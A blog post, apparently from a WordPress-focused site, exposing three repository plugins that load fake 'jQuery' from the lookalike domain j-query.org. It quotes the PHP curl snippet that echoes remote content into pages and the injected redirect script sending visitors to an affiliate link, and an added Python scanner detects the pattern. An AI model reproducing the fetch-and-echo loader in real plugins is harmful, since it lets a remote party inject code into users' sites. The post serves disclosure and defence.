Beware Fake jQuery Inclusions by WordPress Plugins in the Repo

We received an email today from a WordPress user who wanted to alert us to a jQuery hack. At first, I’ve got to admit, I was a little bit sceptical, but I thought it was worth looking into. I was surprised by what I found.

We all love jQuery – sometimes I like to daydream about marrying it in some sort of exotic ceremony in Barbados. In fact, it’s so awesome that it’s become a little bit ubiquitous. There are so many plugins using jQuery that we’re totally used to finding it in them.

Normally a WordPress plugin will get jQuery from just a few places:

  • Google CDN
  • WordPress itself
  • Microsoft CDN
  • jQuery CDN

But what if you had a plugin that was getting its jQuery from http://j-query.org?

That seems pretty legit, right? I mean it’s got j-query in the damned domain! And when you visit it, you end up at http://jquery.org – the official site of jQuery.

Oh… wait…. http://j-query.org and http://jquery.org – they’re not the same, are they?

No, they’re not. And http://j-query.org isn’t even registered by the people at jQuery. It’s registered through Domains by Proxy, and forwards to servers at Media Temple.

So it’s got to be suspicious when you find three WordPress plugins that all contain this piece of code:

if (function_exists('curl_init')) {
	// The "jQuery" is fetched from the lookalike domain, not from any real jQuery CDN
	$url = "http://www.j-query.org/jquery-1.6.3.min.js";
	$ch = curl_init();
	$timeout = 5;
	curl_setopt($ch, CURLOPT_URL, $url);
	curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
	curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
	$data = curl_exec($ch);
	curl_close($ch);
	// Whatever the remote server returns is echoed straight into the page output
	echo "$data";
}
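A quick way for a site owner to check installed plugins for this pattern, as an added example that is not part of the original post: it scans plugin source for remote URLs whose host or filename reads like "jquery" but is not one of the usual sources listed above (the exact CDN hostnames in the allowlist are my assumption, not something the post spells out), and separately flags PHP that curls a remote URL and echoes the body straight into the page. The malicious sample is the snippet from the post; the benign sample is constructed.

```python
import re
from urllib.parse import urlparse

# Hosts a plugin would normally pull jQuery from (assumed hostnames for the
# Google, jQuery and Microsoft CDNs; jQuery bundled with WordPress is local).
TRUSTED_JQUERY_HOSTS = {"ajax.googleapis.com", "code.jquery.com", "ajax.aspnetcdn.com"}

URL_RE = re.compile(r"""https?://[^\s"'<>)]+""", re.IGNORECASE)
# curl_init ... curl_exec ... echo: remote content written into the page unchecked
FETCH_AND_ECHO_RE = re.compile(r"curl_init\s*\(.*?curl_exec\s*\(.*?\becho\b", re.S)


def looks_like_jquery(name: str) -> bool:
    """True if the name reads as 'jquery' once punctuation is stripped,
    so lookalikes such as j-query.org are caught."""
    return "jquery" in re.sub(r"[^a-z0-9]", "", name.lower())


def scan_plugin_source(source: str) -> list:
    """Return findings for a plugin's PHP/JS source text."""
    findings = []
    for url in URL_RE.findall(source):
        host = urlparse(url).hostname or ""
        if host in TRUSTED_JQUERY_HOSTS:
            continue
        filename = url.rsplit("/", 1)[-1]
        if looks_like_jquery(host) or looks_like_jquery(filename):
            findings.append({"kind": "lookalike-jquery-source", "url": url, "host": host})
    if FETCH_AND_ECHO_RE.search(source):
        findings.append({"kind": "remote-fetch-echoed-into-page", "url": None, "host": None})
    return findings


# Sample taken from the snippet in the post above
SAMPLE_MALICIOUS = """if (function_exists('curl_init')) {
    $url = "http://www.j-query.org/jquery-1.6.3.min.js";
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    $data = curl_exec($ch);
    echo "$data";
}"""

# Constructed benign sample: jQuery enqueued from the Google CDN
SAMPLE_BENIGN = """wp_enqueue_script('jquery',
    'https://ajax.googleapis.com/ajax/libs/jquery/1.6.3/jquery.min.js');"""

if __name__ == "__main__":
    for f in scan_plugin_source(SAMPLE_MALICIOUS):
        print(f)
```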

There are three plugins containing this code. They are:

All three of these plugins are from the same person – iintensemedia, who runs the site Iintense Media (also registered through Domains by Proxy, nameservers at Media Temple – doesn’t mean anything, am just sayin’, right?).

Let’s take a look at one of these in trac:

Quick coupon in the WordPress repo

Now, I expect you’ll go running off to that j-query link and then you’ll come running back and be all “Siobhan!” (and btw, it’s pronounced Shavonne – get it right before you shout at me plz. anyway…..) “Siobhan! It’s just a blank page! WTF?”

Yes, I am aware of that – it looks like the offending js has been removed. But a little bit of investigation tells us what it does.

1. The First Clue

Check out this forum thread in which the excited alexpike mentions to the dev that the plugin inserts the following into his header:

<script type="text/javascript">
var now = new Date().getTime();
if (now % 8 == 0) {
    window.location = "http://trk.cpainfinity.com/SHD1";
}
</script>

How does the dev respond?


2. The Plot Thickens

That’s not the only place where someone posted about noticing strange JS being added to their website. A member of the Black Hat World Forums was concerned when his website was hacked.

The member said that this file: http://www.j-query.org/jquery-1.6.4.min.js was propagating this site with CPA Infinity affiliate links. CPA Infinity? Where have we seen that before? In the first clue, dingbats. These are affiliate backlinks to CPA Infinity.

Which means that someone has been making money with a fake http://j-query.org site which fools people into thinking they’re getting some delicious jQuery, when it is actually sending about 1 in every 8 of your visitors to the CPA Infinity link.

Anyway, CPA Infinity didn’t seem to be too impressed about it as their founder has banned the user. Perhaps that’s why the js file is no longer working.

Update: A commenter has noted this link.

the link leads to a black hat seo page

Who’s behind it?

Obviously I couldn’t say. Iintensemedia seems like a good community-minded guy who is always looking for orphaned plugins to adopt. And not at all interested in Black Hat SEO:

Tweet: http://twitter.com/#!/iintense/status/124490755342483456

What’s the Moral of the Story?

Well kids, every good story has got a good moral, and this one does too.

The WordPress Plugin Directory is not infallible. Things get in that can exploit your WordPress website. We’ve written about this before. Unfortunately, while the Theme Directory has strict review guidelines and a committed review team, the Plugin Directory has nothing comparable. We all trust the plugin directory implicitly (we recommended one of the above plugins ourselves), but maybe we aren’t right to do so. Our assumption that the plugin directory is the safest place to get a plugin from maybe isn’t correct. The plugin directory most definitely has its weaknesses, and its weaknesses are the weaknesses of everyone who runs their website on WordPress.

Install some security plugins to keep watch on your site, and be careful where you get your scripts from – you never know what you might catch! ;)

Were you affected by any of these plugins? We’d love to hear your story in the comments.
